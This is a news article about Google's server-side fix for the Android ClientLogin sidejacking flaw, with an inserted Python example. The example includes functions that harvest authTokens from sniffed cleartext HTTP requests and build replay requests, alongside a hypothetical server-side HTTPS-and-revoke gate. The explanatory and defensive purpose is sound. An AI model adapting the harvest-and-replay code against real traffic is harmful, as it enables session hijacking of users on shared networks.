Google Issues Fix For Android ClientLogin Authentication Flaw

Google has begun rolling out a server-side fix for a serious ClientLogin authentication protocol vulnerability in its Android operating system.

Google said last week that it had started deploying a server-side patch. Because the change is made on Google's servers rather than on the handsets, it takes effect for Android devices automatically, without a software update or any user interaction.

"We're starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days," Google said in a statement last week.

"The great news is that it doesn't require a software update on the Android devices themselves - meaning the fix is automatic and worldwide. Effectively this is a silent fix," said Graham Cluley, Sophos senior technology consultant, in a blog post.

The security flaw, disclosed earlier this month by researchers at the University of Ulm in Germany, lies in the way Android apps, including the platform's built-in Calendar, Contacts and Picasa sync clients, use Google's ClientLogin authentication protocol to reach Google services. Security experts contend that the flaw affects at least 97 percent of Android smartphones.


In a sidejacking attack, an eavesdropper on the same network (an open Wi-Fi hotspot, for example) captures the authToken when an app presents it to a Google service over an unencrypted HTTP connection. ClientLogin itself issues the token over HTTPS; the problem is that the affected clients then sent the token in plain HTTP requests to the service, where anyone sniffing the traffic could read it. Because such a token stayed valid for about two weeks, the attacker could replay it long after capture to impersonate the user against Web applications such as Google Calendar, Contacts and Picasa, and against any third-party app that sends a ClientLogin token over plain HTTP in the same way, with Facebook and Twitter cited as examples.

The server-side fix makes Google's services require HTTPS for these connections, so the traffic between the sync clients and Google, including the authToken, is encrypted in transit and cannot be read by someone sniffing the network. It is a change on Google's side, not to the Android software on the phone, which is why no device update is needed. Google's statement covers calendar and contacts data; the Picasa sync described above is not mentioned in it.
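The following is an added example, not code from the original article, from the Ulm researchers or from Google. It puts both sides of the two preceding paragraphs into working form: first, what a passive sniffer on an open network could harvest from the cleartext sync requests (the requests, host names and token values are constructed for illustration; the `Authorization: GoogleLogin auth=...` header format and the service codes cl, cp and lh2 are the documented ClientLogin ones); second, a hypothetical server-side policy in the spirit of the fix described above (an assumption about how such a fix can be built, not Google's actual implementation): a token is honoured only over HTTPS, and a token that shows up in cleartext is treated as compromised, revoked, and the client redirected to HTTPS to obtain a fresh one.

```python
"""Added example: ClientLogin sidejacking, sniffer side and server side.

Constructed data throughout; not the article's, the researchers' or Google's code.
"""
import re
from dataclasses import dataclass

# Documented ClientLogin service codes, keyed by the API path prefix the
# token is presented to: cl = Calendar, cp = Contacts, lh2 = Picasa Web Albums.
SERVICE_BY_PATH = {
    "/calendar/": "cl",
    "/m8/feeds/": "cp",
    "/data/feed/api/": "lh2",
}

# Constructed capture: what a sniffer sees on port 80. Only cleartext is
# visible; an HTTPS request would never appear here in readable form.
CAPTURED_REQUESTS = [
    "GET /calendar/feeds/default/allcalendars/full HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Authorization: GoogleLogin auth=DQAAAK4AAAD_cl_EXAMPLE_TOKEN_1\r\n"
    "User-Agent: Android-GData/1.1\r\n\r\n",
    "GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Authorization: GoogleLogin auth=DQAAAK4AAAD_cp_EXAMPLE_TOKEN_2\r\n\r\n",
    # Unrelated cleartext request with no ClientLogin token: ignored.
    "GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
]

REQ_RE = re.compile(r"^([A-Z]+)\s+(\S+)\s+HTTP/1\.[01]\r?$", re.M)
HOST_RE = re.compile(r"^Host:\s*(\S+)\s*$", re.I | re.M)
AUTH_RE = re.compile(r"^Authorization:\s*GoogleLogin\s+auth=(\S+)\s*$", re.I | re.M)


@dataclass(frozen=True)
class HarvestedToken:
    host: str
    path: str
    service: str
    token: str


def service_for_path(path):
    """Map an API path to the ClientLogin service the token is bound to."""
    for prefix, code in SERVICE_BY_PATH.items():
        if path.startswith(prefix):
            return code
    return "unknown"


def harvest_tokens(raw_requests):
    """Sniffer view: pull every ClientLogin token out of cleartext requests."""
    found = []
    for raw in raw_requests:
        req, host, auth = REQ_RE.search(raw), HOST_RE.search(raw), AUTH_RE.search(raw)
        if not (req and host and auth):
            continue
        path = req.group(2)
        found.append(HarvestedToken(host.group(1), path, service_for_path(path), auth.group(1)))
    return found


def replay_request(harvested):
    """The impersonation step: the token alone authenticates a fresh request
    from the attacker's machine, with no password involved."""
    return (f"GET {harvested.path} HTTP/1.1\r\nHost: {harvested.host}\r\n"
            f"Authorization: GoogleLogin auth={harvested.token}\r\n\r\n")


class TokenGate:
    """Hypothetical server-side policy (illustration, not Google's code):
    honour a token only over HTTPS; a token seen in cleartext has been
    exposed to everyone on the path, so revoke it and redirect the client."""

    PREFIX = "GoogleLogin auth="

    def __init__(self):
        self.revoked = set()

    def authorize(self, scheme, host, path, headers):
        auth = headers.get("Authorization", "")
        if not auth.startswith(self.PREFIX):
            return 401, {"WWW-Authenticate": "GoogleLogin"}
        token = auth[len(self.PREFIX):]
        if scheme != "https":
            self.revoked.add(token)  # burned: it just travelled in the clear
            return 301, {"Location": f"https://{host}{path}"}
        if token in self.revoked:
            return 401, {"WWW-Authenticate": "GoogleLogin"}
        return 200, {}


if __name__ == "__main__":
    for t in harvest_tokens(CAPTURED_REQUESTS):
        print(f"{t.service:>3}  {t.host}{t.path}  token={t.token}")
```

The redirect alone would not be enough: the first cleartext request has already leaked its token, which is why the gate also revokes it, forcing the client back through the (HTTPS) ClientLogin endpoint for a new one. A client that remembers the HTTPS location, as current Android sync clients do, never hits the cleartext path again.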

Users running the latest Android release, version 2.3.4, are already protected against these sidejacking attacks, but the vast majority of devices still run older, vulnerable versions of the operating system, which is why a fix that does not depend on a device update matters.

Thus far, no active attacks exploiting Android's ClientLogin authentication flaw have been detected in the wild.